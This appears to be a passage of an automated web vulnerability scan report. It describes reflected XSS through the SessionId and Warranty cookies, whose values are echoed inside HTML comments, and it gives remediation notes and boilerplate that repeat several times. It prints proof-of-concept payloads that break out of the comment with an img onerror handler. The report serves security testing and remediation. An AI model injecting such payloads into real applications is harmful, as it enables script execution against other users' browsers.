Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 200ee--><img%20src%3da%20onerror%3dalert(1)>69b74c839f5 was submitted in the SessionId cookie. This input was echoed as 200ee--><img src=a onerror=alert(1)>69b74c839f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Warranty cookie is copied into an HTML comment. The payload 87a7f--><img%20src%3da%20onerror%3dalert(1)>a511299d89d was submitted in the Warranty cookie. This input was echoed as 87a7f--><img src=a onerror=alert(1)>a511299d89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.